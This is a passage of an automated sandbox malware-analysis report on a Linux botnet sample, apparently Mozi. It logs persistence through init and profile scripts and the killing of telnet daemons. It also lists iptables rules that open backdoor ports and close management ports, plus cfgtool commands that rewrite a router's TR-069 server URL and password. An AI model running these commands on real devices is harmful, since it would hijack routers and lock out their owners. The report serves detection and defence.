                            Source: /tmp/bin.sh (PID: 6792)HTML file containing JavaScript created: /usr/networksJump to dropped file
                            Source: bin.sh, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                            Source: 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                            Source: 6821.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                            Source: 6790.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                            Source: /usr/networks, type: DROPPEDMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                            Source: ELF static info symbol of initial sample.symtab present: no
                            Source: classification engineClassification label: mal100.spre.troj.evad.linSH@0/221@4/0

                            Persistence and Installation Behavior:

                            barindex
                            Sample tries to persist itself using System V runlevelsShow sources
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/rcS.d/S95baby.shJump to behavior
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/rc.localJump to behavior
                            Sample tries to persist itself using /etc/profileShow sources
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/profile.d/cedilla-portuguese.shJump to behavior
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/profile.d/apps-bin-path.shJump to behavior
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/profile.d/Z97-byobu.shJump to behavior
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/profile.d/bash_completion.shJump to behavior
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/profile.d/vte-2.91.shJump to behavior
                            Executes the "iptables" command to insert, remove and/or manipulate rulesShow sources
                            Source: /bin/sh (PID: 6827)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6857)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6863)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6897)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6913)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6935)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6948)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6973)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6992)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                            Source: /bin/sh (PID: 6995)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                            Source: /bin/sh (PID: 6998)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                            Source: /bin/sh (PID: 7010)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                            Source: /bin/sh (PID: 7067)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                            Source: /bin/sh (PID: 7093)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                            Source: /bin/sh (PID: 7122)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                            Source: /bin/sh (PID: 7145)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                            Source: /bin/sh (PID: 7163)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                            Source: /bin/sh (PID: 7179)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                            Source: /bin/sh (PID: 7200)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                            Source: /bin/sh (PID: 7216)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                            Source: /bin/sh (PID: 7230)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                            Source: /bin/sh (PID: 7248)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                            Source: /bin/sh (PID: 7261)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                            Source: /bin/sh (PID: 7290)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                            Source: /bin/sh (PID: 7316)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7319)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7327)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7351)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7378)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7405)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7426)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7439)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT
                            Sample reads /proc/mounts (often used for finding a writable filesystem)Show sources
                            Source: /tmp/bin.sh (PID: 6792)File: /proc/6792/mountsJump to behavior
                            Terminates several processes with shell command 'killall'Show sources
                            Source: /bin/sh (PID: 6797)Killall command executed: killall -9 telnetd utelnetd scfgmgr
                            Source: /tmp/bin.sh (PID: 6792)File written: /usr/networksJump to dropped file
                            Source: /tmp/bin.sh (PID: 6792)Shell script file created: /etc/rcS.d/S95baby.shJump to dropped file
                            Source: /tmp/bin.sh (PID: 6792)Shell script file created: /etc/init.d/S95baby.shJump to dropped file
                            Source: /tmp/bin.sh (PID: 6819)Reads from proc file: /proc/statJump to behavior
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/230/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/231/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/232/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/233/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/234/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3512/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/359/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/1452/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3632/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3518/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/10/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/1339/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/11/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/12/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/13/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/14/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/15/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/16/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/17/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/18/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/19/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/483/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3527/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3527/cmdline
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/1/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/2/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3525/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/1346/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3524/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3524/cmdline
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/4/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3523/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/5/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/7/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/8/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/9/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/20/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/21/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/22/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/23/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/24/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/25/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/28/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/29/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/1363/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3541/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3541/cmdline
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/1362/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/496/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/496/cmdline
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/30/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/31/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/31/cmdline
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/1119/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3310/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3431/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3431/cmdline
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/263/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/264/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/385/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/144/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/386/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/145/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/146/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3546/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3546/cmdline
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/147/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3303/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3545/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/148/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/149/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3543/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/822/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/822/cmdline
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3308/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3308/cmdline
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3429/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3429/cmdline
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/6395/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/47/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/48/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/48/cmdline
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/49/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/150/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/271/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/151/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/152/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/153/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/395/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/154/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/396/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/155/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/156/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/157/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/158/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/159/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3432/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3432/cmdline
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/50/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/51/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3678/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/52/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/53/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/54/stat
                            Source: /bin/sh (PID: 6827)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6857)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6863)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6897)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6913)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6935)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6948)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6973)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6992)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                            Source: /bin/sh (PID: 6995)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                            Source: /bin/sh (PID: 6998)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                            Source: /bin/sh (PID: 7010)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                            Source: /bin/sh (PID: 7067)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                            Source: /bin/sh (PID: 7093)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                            Source: /bin/sh (PID: 7122)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                            Source: /bin/sh (PID: 7145)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                            Source: /bin/sh (PID: 7163)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                            Source: /bin/sh (PID: 7179)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                            Source: /bin/sh (PID: 7200)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                            Source: /bin/sh (PID: 7216)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                            Source: /bin/sh (PID: 7230)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                            Source: /bin/sh (PID: 7248)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                            Source: /bin/sh (PID: 7261)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                            Source: /bin/sh (PID: 7290)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                            Source: /bin/sh (PID: 7316)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7319)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7327)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7351)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7378)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7405)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7426)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7439)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT
                            Source: /tmp/bin.sh (PID: 6792)File: /usr/networks (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                            Source: /tmp/bin.sh (PID: 6794)Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
                            Source: /tmp/bin.sh (PID: 6825)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT"
                            Source: /tmp/bin.sh (PID: 6855)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT"
                            Source: /tmp/bin.sh (PID: 6858)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT"
                            Source: /tmp/bin.sh (PID: 6893)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT"
                            Source: /tmp/bin.sh (PID: 6904)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 47453 -j ACCEPT"
                            Source: /tmp/bin.sh (PID: 6932)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT"
                            Source: /tmp/bin.sh (PID: 6940)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT"
                            Source: /tmp/bin.sh (PID: 6967)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT"
                            Source: /tmp/bin.sh (PID: 6990)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
                            Source: /tmp/bin.sh (PID: 6993)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
                            Source: /tmp/bin.sh (PID: 6996)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
                            Source: /tmp/bin.sh (PID: 7002)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
                            Source: /tmp/bin.sh (PID: 7031)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
                            Source: /tmp/bin.sh (PID: 7047)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
                            Source: /tmp/bin.sh (PID: 7060)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
                            Source: /tmp/bin.sh (PID: 7087)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
                            Source: /tmp/bin.sh (PID: 7114)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
                            Source: /tmp/bin.sh (PID: 7140)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
                            Source: /tmp/bin.sh (PID: 7158)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
                            Source: /tmp/bin.sh (PID: 7171)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
                            Source: /tmp/bin.sh (PID: 7194)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
                            Source: /tmp/bin.sh (PID: 7209)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
                            Source: /tmp/bin.sh (PID: 7224)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
                            Source: /tmp/bin.sh (PID: 7241)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
                            Source: /tmp/bin.sh (PID: 7255)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
                            Source: /tmp/bin.sh (PID: 7280)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
                            Source: /tmp/bin.sh (PID: 7314)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT"
                            Source: /tmp/bin.sh (PID: 7317)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT"
                            Source: /tmp/bin.sh (PID: 7321)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT"
                            Source: /tmp/bin.sh (PID: 7344)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT"
                            Source: /tmp/bin.sh (PID: 7369)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 4000 -j ACCEPT"
                            Source: /tmp/bin.sh (PID: 7395)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT"
                            Source: /tmp/bin.sh (PID: 7420)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT"
                            Source: /tmp/bin.sh (PID: 7432)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT"
                            Source: submitted sampleStderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705: exit code = 0

                            Hooking and other Techniques for Hiding and Protection:

                            barindex
                            Drops files in suspicious directoriesShow sources
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/init.d/S95baby.shJump to dropped file
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/init.d/mountall.shJump to dropped file
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/init.d/checkfs.shJump to dropped file
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/init.d/umountnfs.shJump to dropped file
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/init.d/mountkernfs.shJump to dropped file
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/init.d/checkroot-bootclean.shJump to dropped file
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/init.d/mountnfs-bootclean.shJump to dropped file
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/init.d/bootmisc.shJump to dropped file
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/init.d/checkroot.shJump to dropped file
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/init.d/hwclock.shJump to dropped file
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/init.d/hostname.shJump to dropped file
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/init.d/mountdevsubfs.shJump to dropped file
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/init.d/mountall-bootclean.shJump to dropped file
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/init.d/mountnfs.shJump to dropped file
                            Source: /tmp/bin.sh (PID: 6792)File: /usr/bin/gettext.shJump to dropped file
                            Source: /tmp/bin.sh (PID: 6792)File: /usr/sbin/alsa-info.shJump to dropped file
                            Uses known network protocols on non-standard portsShow sources
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34674
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34680
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34684
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34686
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34688
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34690
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34692
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34694
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34696
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 35276
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 35278
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 35290
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 35292
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 35298
                            Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 35300
                            Source: unknownNetwork traffic detected: HTTP traffic on port 32848 -> 8443
                            Source: /sbin/iptables (PID: 6842)Modprobe: /sbin/modprobe -> /sbin/modprobe ip_tables
                            Source: /tmp/bin.sh (PID: 6777)Queries kernel information via 'uname':
                            Source: /tmp/bin.sh (PID: 6792)Queries kernel information via 'uname':
                            Source: /tmp/bin.sh (PID: 6815)Queries kernel information via 'uname':
                            Source: /sbin/modprobe (PID: 6842)Queries kernel information via 'uname':
                            Source: /usr/share/apport/apport-gtk (PID: 7504)Queries kernel information via 'uname':
                            Source: /usr/share/apport/apport-gtk (PID: 7526)Queries kernel information via 'uname':
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opts_set_defaults
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qapi/string-output-visitor.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qom/container.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_thread_naming
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opt_foreach
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_getauxval
